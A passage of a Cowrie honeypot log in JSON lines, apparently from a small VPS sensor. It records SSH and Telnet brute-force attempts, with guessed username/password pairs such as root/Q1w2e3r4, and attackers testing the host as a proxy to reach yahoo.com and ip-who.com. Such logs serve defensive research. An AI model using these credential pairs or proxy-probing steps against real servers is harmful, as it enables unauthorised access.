-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:30.274993Z","src_ip":"212.227.235.229","session":"d329e48cbed4"}
{"eventid":"cowrie.login.failed","username":"anton","password":"anton","message":"login attempt [anton/anton] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:31.929929Z","src_ip":"212.227.235.229","session":"85fbe13d7949"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:32.198134Z","src_ip":"212.227.235.229","session":"7bb3731dab5b"}
{"eventid":"cowrie.login.success","username":"root","password":"explorer","message":"login attempt [root/explorer] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:10:32.834932Z","src_ip":"212.227.235.229","session":"da7db3459341"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:10:33.757431Z","session":"da7db3459341"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:33.876623Z","src_ip":"212.227.235.229","session":"85fbe13d7949"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:34.252018Z","src_ip":"212.227.235.229","session":"7bb3731dab5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:10:34.322884Z","src_ip":"212.227.235.229","session":"da7db3459341"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44204,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c24ca8f4864","protocol":"ssh","message":"New connection: 212.227.235.229:44204 (1.2.3.4:22) [session: 0c24ca8f4864]","sensor":"my-vps","timestamp":"2025-08-26T21:10:34.602793Z"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:34.745687Z","src_ip":"212.227.235.229","session":"da7db3459341"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:35.809366Z","src_ip":"212.227.235.229","session":"0c24ca8f4864"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:36.848613Z","src_ip":"212.227.235.229","session":"0c24ca8f4864"}
{"eventid":"cowrie.login.failed","username":"office","password":"office","message":"login attempt [office/office] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:37.808994Z","src_ip":"212.227.235.229","session":"d329e48cbed4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49766,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ef463ea6583","protocol":"telnet","message":"New connection: 212.227.235.229:49766 (1.2.3.4:23) [session: 6ef463ea6583]","sensor":"my-vps","timestamp":"2025-08-26T21:10:39.103059Z"}
{"eventid":"cowrie.login.failed","username":"software","password":"software","message":"login attempt [software/software] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:39.409953Z","src_ip":"212.227.235.229","session":"0c24ca8f4864"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:40.947397Z","src_ip":"212.227.235.229","session":"d329e48cbed4"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:45.394802Z","src_ip":"212.227.235.229","session":"0c24ca8f4864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42662,"dst_ip":"1.2.3.4","dst_port":22,"session":"13318b16c74a","protocol":"ssh","message":"New connection: 212.227.235.229:42662 (1.2.3.4:22) [session: 13318b16c74a]","sensor":"my-vps","timestamp":"2025-08-26T21:10:53.907177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:10:53.909348Z","src_ip":"212.227.235.229","session":"13318b16c74a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:10:54.170247Z","src_ip":"212.227.235.229","session":"13318b16c74a"}
{"eventid":"cowrie.login.failed","username":"xbmc","password":"xbmc","message":"login attempt [xbmc/xbmc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:10:56.347843Z","src_ip":"212.227.235.229","session":"13318b16c74a"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:10:57.615350Z","src_ip":"212.227.235.229","session":"13318b16c74a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41738,"dst_ip":"1.2.3.4","dst_port":22,"session":"32c55154df11","protocol":"ssh","message":"New connection: 212.227.235.229:41738 (1.2.3.4:22) [session: 32c55154df11]","sensor":"my-vps","timestamp":"2025-08-26T21:11:08.013767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:11:08.033353Z","src_ip":"212.227.235.229","session":"32c55154df11"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:11:09.303042Z","src_ip":"212.227.235.229","session":"32c55154df11"}
{"eventid":"cowrie.session.closed","duration":31.352006673812866,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:10.454985Z","src_ip":"212.227.235.229","session":"6ef463ea6583"}
{"eventid":"cowrie.login.failed","username":"joro","password":"joro","message":"login attempt [joro/joro] failed","sensor":"my-vps","timestamp":"2025-08-26T21:11:12.049023Z","src_ip":"212.227.235.229","session":"32c55154df11"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:13.335971Z","src_ip":"212.227.235.229","session":"32c55154df11"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54758,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac24e5f88b2","protocol":"ssh","message":"New connection: 213.209.150.239:54758 (1.2.3.4:22) [session: dac24e5f88b2]","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.613409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.614043Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.661377Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.898126Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14583,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14583","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.946940Z","session":"dac24e5f88b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:11:17.994490Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28917,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28917","sensor":"my-vps","timestamp":"2025-08-26T21:11:18.129855Z","session":"dac24e5f88b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:11:18.177557Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:18.225579Z","src_ip":"213.209.150.239","session":"dac24e5f88b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59850,"dst_ip":"1.2.3.4","dst_port":22,"session":"d585cace115e","protocol":"ssh","message":"New connection: 212.227.235.229:59850 (1.2.3.4:22) [session: d585cace115e]","sensor":"my-vps","timestamp":"2025-08-26T21:11:27.404338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T21:11:27.405166Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T21:11:27.513777Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:11:28.057403Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.228.208.160","dst_port":443,"src_ip":"212.227.235.229","src_port":39030,"message":"direct-tcp connection request to 54.228.208.160:443 from 127.0.0.1:39030","sensor":"my-vps","timestamp":"2025-08-26T21:11:31.257480Z","session":"d585cace115e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.228.208.160","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03c\\xc1\\x84\\x15\\xaa\\xec\\xd3b\\xdey\\xfb\\x91\\xaa_\\xf7\\xa9\\xb7A\\xc5\\xe1\\xe5(@_\\xfe\\x9eN\\x0f\\r\\xce\\xa1G 